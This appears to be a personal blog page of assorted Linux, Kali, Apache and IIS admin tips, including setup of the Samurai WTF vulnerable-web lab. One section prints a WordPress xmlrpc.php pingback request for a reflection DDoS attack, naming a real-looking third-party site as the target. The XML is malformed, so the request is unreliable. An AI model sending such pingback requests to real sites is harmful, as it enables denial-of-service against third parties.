Using CAT as a Text Editor

When there’s only the CAT command this is how you use it as a text editor:

$cat > Filename

Then, in the console, write the text. When you’re done press CTRL+D

Opening the file, you’ll find its contents is your entered text. Careful you don’t overwrite an existing file.

Samurai WTF

Download and install Samurai for VMWARE Workstation (https://sourceforge.net/projects/samurai/files/)

Unzip and double click on the *.vmx file

Default Username/password: samurai/samurai

Samurai has vulnerable websites:

  • Dojo-Basics
  • BwAPPs
  • DVWA
  • Mutillidae

Allow network access to the them by modifying the *.conf files which can be found /etc/apache2/sites-available.

To open the file use this command: sudo gedit bwapp.conf

Check to see which services are running on which ports by using this command: grep -ri listen /etc/apache2

Modify the IP address from <IP>:<port> to *.<port>

Save the files

Restart Apache using this command: /etc/init.d/apache2 restart

This error means more than one service is running on the same ports

 

Change Resolution size in Kali using Command Line

To change the screen resolution in Kali using the Terminal type

xrandr

 

Then choose your desired dimension by typing

xrandr -s 1280×768

WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress.  I am going to show how to create a request to recreate the attack.  The attack send upwards of 400 Gbps through the internet. By comparison you’re home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.

 

I created the request in BURP PROXY:

Capture (1)

POST /xmlrpc.php HTTP/1.0
Host: https://prod.nestle-hcp.com.au/breastfeeding/
Content-Type: text/xml
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://ec2-107-22-52-34.compute-1.amazonaws.com</string></value>
</param>
<param>
<value>
<string>https://prod.nestle-hcp.com.au/?p=45</script>
<value>
</param>
<params>
</methodCall>

See a List of Users in Linux

cat /etc/passwd | cut -d":" -f1

Install Kali on USB using Macbook Air

So I’m trying to install Kali on a Kingston USB 8Gb stick

  1. Download Kali from here
  2. I then used Disk Utility on the Mac to create 2 partitions

Disk Utility

 

  1. Create Folder Structure on USB
    • EFI/BOOT
  2. Unmount the Kingston usb stick
    • “sudo diskutil unmount /dev/disk1”
    • or “sudo diskutil unmountDisk /dev/disk1”
  3. Copy these files to BOOT Folder
  4. Copy ISO to USB
    • sudo dd if=/path/to/ISO of=/dev/rdisk1 bs=1m
    • Ctrl+t shows the progress

 

Socat

socat -v TCP-LISTEN:8091,reuseaddr,fork TCP:127.0.0.1:80

WebServer on Mac

in Terminal:

  1. Start: apachectl start
  2. Stop: apachectl stop
  3. Restart: apachectl restart

Default File Location:

  • /Library/WebServer/Documents/index.html.en

Opening a file from the Terminal in Mac

sudo open -a <app> <file>

Removing Bindings from IIS Sites

1.  Backup the config file C:\Windows\System32\Inetsrv\config\applicationHost.config and then open it up in notepad.

2.  Search for the web site you want to edit.

Modify the applicationHost.config file to remove the :443 setting

The <bindings> area is what you are looking for, as you will want to remove the line <binding protocol=”https” bindingInformatino=”*:443:” />

3.  Save this file, refresh IIS and start or restart the web site, and you will see your changes you made.

 

http://cregan.wordpress.com/2008/04/11/more-than-1-ssl-secured-sharepoint-site-on-1-ip-address-in-iis7/